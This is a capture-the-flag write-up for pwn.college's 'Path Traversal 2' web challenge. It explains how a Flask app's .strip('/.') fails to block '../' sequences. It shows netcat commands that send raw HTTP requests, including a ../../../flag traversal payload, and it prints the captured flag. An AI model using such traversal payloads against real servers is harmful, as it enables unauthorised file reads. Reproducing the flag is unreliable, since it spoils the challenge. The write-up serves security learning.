π΅οΈββοΈ Challenge: Path Traversal 2
Writeup from Web Security
Category: Web Security
Platform: pwn.college
Level: Intermediate
Vulnerability: Path Traversal
Goal: Read the flag file by bypassing directory restrictions.
𧩠Description
Weβre given a Flask web app with endpoints at /data and /data/<path>, which serve files from the /challenge/files/ directory. Our goal is to access the flag file located outside this directory.
π Recon
Step 1: Basic GET request
printf "GET /data HTTP/1.0\r\nHost:challenge.localhost\r\n\r\n" | nc challenge.localhost 80
Response:
Returns the content of index.html and lists available fortune files.
The endpoint works and hints at the existence of deeper files inside /files/fortunes.
π§ Vulnerability Insight
The server code builds file paths like this:
requested_path = app.root_path + "/files/" + path.strip("/.")
The bug is in the use of .strip(β/.β). It removes only leading/trailing slashes and dots, but not sequences like ../../../. So, path traversal is still possible! β
Exploiting Path Traversal
Step 2: Attempt to access directory (Fails)
printf "GET /data/fortunes HTTP/1.0\r\nHost:challenge.localhost\r\n\r\n" | nc challenge.localhost 80
This returns a 500 error β probably because itβs trying to read a directory, not a file.
Step 3: Path traversal to access flag
printf "GET /data/fortunes/../../../flag HTTP/1.0\r\nHost:challenge.localhost\r\n\r\n" | nc challenge.localhost 80
Success! This bypasses the file restriction and accesses the flag.
Response:
pwn.college{oDarDRBzk56F2i1vM_ERNz7PJ7U.QXyYTN2wSM0IzMyEzW}
Flag
pwn.college{oDarDRBzk56F2i1vM_ERNz7PJ7U.QXyYTN2wSM0IzMyEzW}